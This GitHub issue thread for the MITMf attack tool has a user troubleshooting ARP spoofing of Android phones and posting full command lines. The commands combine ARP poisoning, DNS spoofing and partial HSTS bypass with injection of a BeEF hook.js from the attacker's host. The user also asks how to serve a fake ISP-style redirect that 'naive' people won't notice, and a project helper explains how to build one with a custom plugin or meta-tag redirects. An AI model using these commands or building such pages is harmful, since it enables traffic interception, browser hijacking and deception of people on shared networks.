### ISSUE TITLE
instagram connection always breaks plus general connection issues 

### ISSUE THREAD

**Issue by shufan123** [byt3bl33d3r/MITMf#230] opened 2015-12-12 05:49 UTC
Hello,
I am on kali 2.0, my targets are multiple androids 4.0+ and i have an alfa awus036nha.

nothing went wrong with the installation process..
 
I am on eth0 and wlan0 at the same time,
 to get eth0 to work alongside wlan0 (i surf on eth0 and sniff on wlan0), i installed wicd network manager but before i did, i had the same set of problems. 

Google is my home page and i can see that it is being intercepted properly from the appoison badge and the **`"flash player is obsolete"`** message but when i surf  facebook using the stock browser of any of the phones:

Sometimes i get this message http://pastebin.com/UyRAxh8M and on the browser i am redirected to webm.facebook.com, then to social.facebook.com where i get a **`"no server named social.facebook.com"`** page.

Sometimes i get a legit https connection but on the facebook home page it shows **`no connection please check your blah blah blah`**while all what mitmf shows is this message over and over.
      ---------------------------------------------------------------------------------------------------------------------------
`[ARPpoisoner] [ARPWatch] Gateway asking where 192.168.1.64 is. Sending the "I'm 192.168.1.64 biatch!" reply! `

`[ARPWatch] 192.168.1.64 is asking where the Gateway is. Sending the "I'm the gateway biatch!" reply!`
      ---------------------------------------------------------------------------------------------------------------------------
Router, phones, pc are all either in my hands ,in line of sight or next room.

Tried all combinations but i wanted to note that if i specify a target; connection speed is much slower and it is in the form of bursts as if it collects  then releases... tried wireshark and i could see clearly that me and the router are fighting over the victim and the victim gets confused then i win , then  we fight again and this cycle is repeated every 8-15 sec beside the huge amount of lost packets marked in black...

If i don't specify a target, connection is very smooth.
 
If i change `arp interval` in the `arpspoof.py` to 1 instead of 3, it seems to be able to resolve the fight much faster and without as much losses.

I know i could cause an arp-dos attack if speed is high but are decimals allowed? 

Instagram app works well for a 15-20 sec period but if i try to search or see the account settings page connection gets dead immediately and i get something like this again and nothing more. 
      ---------------------------------------------------------------------------------------------------------------------------
`[ARPpoisoner] [ARPWatch] Gateway asking where 192.168.1.64 is. Sending the "I'm 192.168.1.64 biatch!" reply!`

`[ARPWatch] 192.168.1.64 is asking where the Gateway is. Sending the "I'm the gateway biatch!" reply!`
      ---------------------------------------------------------------------------------------------------------------------------

I always set log-level to debug .
      ---------------------------------------------------------------------------------------------------------------------------
`python mitmf.py --spoof --arp -i wlan0 --gateway 192.168.1.254 --log-level debug   --hsts `

`python mitmf.py --spoof --arp -i wlan0 --gateway 192.168.1.254 --log-level debug --js-url http://192.168.1.76:8000/hook.js --browserprofiler --screen --responder --appoison --hsts --nbtns --wredir --inject --dns`

`python mitmf.py --spoof --arp -i wlan0 --gateway 192.168.1.254 --log-level debug --js-url http://192.168.1.76:8000/hook.js --browserprofiler --screen --responder --appoison --hsts --nbtns --wredir --inject --hta --dns`
      ---------------------------------------------------------------------------------------------------------------------------
And all different combinations .
The first one sometimes is the best and sometimes the last one is the best .

All servers/services started by mitmf are up and running and i never get an error. 

if you know the problem but you currently can't help, you could point me, i can try and then i can post here as an enhancement... 

Thank you.

**Comment by byt3bl33d3r** [comment] 2016-01-06 03:53
oh boy, well I'll let @HAMIDx9 handle this one if he/she wants to (thanks btw @HAMIDx9 for helping out :D) , in any case it seems that you're lacking some basic understating of whats actually going on

**Comment by shufan123** [comment] 2016-01-06 05:45
@byt3bl33d3r actually i think the problem is that i can't seperate the two interfaces so the wlan  and the lan router end up arping each other , or maybe its a kali glitch becuase if i use ` nmap -e wlan0 192.168.1.0/24 ` , i see users i am sure they are on my lan interface..
 It would help if you pinpoint what you mean by i lack some basic understanding or what i got wrong because i've read your code and i can understand it (i think) .

**Comment by HAMIDx9** [comment] 2016-01-07 22:54
Hi, 
Ok. @byt3bl33d3r i got this ;). thanks.

Unfortunately this issue consists of multiple issues and has low information about each items. anyway ( work in progress)
1. DNS server seems to have a bug. When `HSTS bypass` is enabled `proxyrequest` may return a `None` value due to timeout or other reasons. and `hstsbypass` method does not handle this properly. (i try to send a pr ASAP)

2. In term of arp poisoning we don't have a clear *race condition* which you stated before. just in some cases this may happen but `MITMf` fix that by using an interval. So you should provide more info about your case. I suggest you to check `arp -a` continuously and if you see gateway mac changed back to its original while `MITMf` is running there's an issue. if you can give us a captured pcap there are some chances to look up the problem. In a word there is no such a fight between gateway and attacker! and obviously target base attack should be more efficient than whole network monitoring.

Please run `MITMf` in both target base and whole network mode check the `arp`. if it is necessary you can capture ARP requests and responses using `wireshark` and provide me to further investigation.

3. Again i should pinpoint `MITMf hsts` stands for partial hsts bypass and may not work in hardened sites. In fb if you check the page it just load the top navbar and then page's js responsible to load other elements. So if the requests goes to https sites you will not see those reqs (just see dns requests) since we monitor port 80 not 443. I don't want to disappoint you but clearly with some security features in mind `MITMf` does not provide full hsts bypass and it has not been designed for that at all. If you insist on things like this you can research about how abusing NTP can be used to bypass hsts and also other methods and analyze your target environment carefully to implement the proper attack.

4. You wrote about Instagram app. first of all i did not analyze this app behavior but above description can fit this issue. but what you mean about it works for seconds first and does not work then? provide us some useful info about your case. what you see and pass us errors! in case we can investigate more. anyway i should check this app and come back here.

Ok too much talking. We can continue if you provide useful data in detail.

**Comment by shufan123** [comment] 2016-01-08 01:23
Hi @HAMIDx9 , and thanks for your patience, 
*  True enough.

* by changing the interval i got to alleviate the *race condition* a bit but actually the cause of the *race condition* is that i have both eth0 and wlan0 connected and both interfaces 's traffic seem to mix cause i can see the two routers arping each other which is just too weird and some traffic is just being dropped by the *anti-spoofing protection* or something mechanism in the linux kernel and i knew this just by hooking up one interface, disconnecting the other and bam, everything was solved , so i guess need to make some rules and routes (Ubuntu at default is much better than kali in this case ). 

* Yeah, i know that :-( and i can see why you emphasize on that because i have seen many thinking that mitmf defeats hsts and i know about the delorean too.

* yeah, about that, if you are scrolling, pictures and videos are being loaded but the problem happens if there is a video cause mitmf doesn't load the rest of the pics till the video is loaded and that always happens and if you are just scrolling not watching videos , mitmf still waits till the videos are downloaded then it continues with the pictures which always is annoying.
*is there a way i could do a redirect response like ISP does if you didn't pay cause many people are naive  enough not to notice. 

Thanks.

**Comment by HAMIDx9** [comment] 2016-01-08 07:23
@shufan123 I'm confused a bit. you have two interfaces on your attacker box and both are connected to the same router? 
Then arp spoofer works on wlan0 but you see arp packets from eth0? Correct me if i'm wrong.

if this is your situation it is normal and you can use `--ignore` to pass your `eth0` from being attacked. otherwise please explain more and tell us about IP ranges.

**Comment by shufan123** [comment] 2016-01-08 07:49
@HAMIDx9 oh, i am very sorry if i am not clear enough,
no, two separate routers with two different brands with two different ISPs , 

wlan0 's router is at 192.168.1.254
eth0 's router is at 192.168.1.1
I have an i.p. 192.168.1.7 on eth0  and 192.168.1.68 on wlan0

My targets are androids on chrome generally.

I refrained from saying this to @byt3bl33d3r , lest he will feel insulted;  dunno why but i have a deep feeling that he works for hacking team or some company and his tool has gone public for debugging purposes cause he can't ask clients to do that and your insisting on saying "we" instead of "I" makes me believe it and think you are a new recruit in the company....

Hope this will make you laugh instead of feeling insulted ;-) . Be well .

**Comment by shufan123** [comment] 2016-01-08 07:57
@HAMIDx9 I think mitmf 's issue with instagram is  because mitmf has no way of determining which is in focus and which is out of focus in case you are scrolling down so it attempts to download all that is requested even though the browser/app doesn't complete receiving what was requested or am i wrong or even worse ,not clear .

**Comment by HAMIDx9** [comment] 2016-01-08 08:39
Ok. this is why you see those ARP packets. two separate interfaces with same ip range. although i believe we should not see this behavior because of specifying interface in `MITMf` and `scapy` but this is it. anyway this is not a good idea to have two separate router which provide same ip range. anyway.

@shufan123 this is an open source tool and @byt3bl33d3r seems to be so busy recently and i'm using `MITMf` for months and have a deep experience in its internal. anyway this is your thoughts not mine ;)

about instagram app since `MITMf` uses multi-*threaded* approach, i suspect this behavior caused by this. I have a branch which has partial fix for this. I will look into this later.

Yes. you can do it by a completely customize plugin in `MITMf` (by manipulating `data` in response method like what `upsidedownternet.py` does) and another way is using `HTTP` responder which has builtin customs page support. In term of redirection you can use `meta` tags in order to do so or other methods.

**Comment by shufan123** [comment] 2016-01-08 08:46
@HAMIDx9 
Hahahaha .

its not just the arp i totally break every device 's connection on wlan0 everytime i start mitmf or stall it and cause the burst effect i described upwards.

nmap gets confused too even though i specify the interface ( nmap -e wlan0 ) and scans both interfaces and that's why i think i need to set some rules/tables .

Thank you very much

**Closed** 2016-01-11 05:48 UTC
Labels: dafuq?
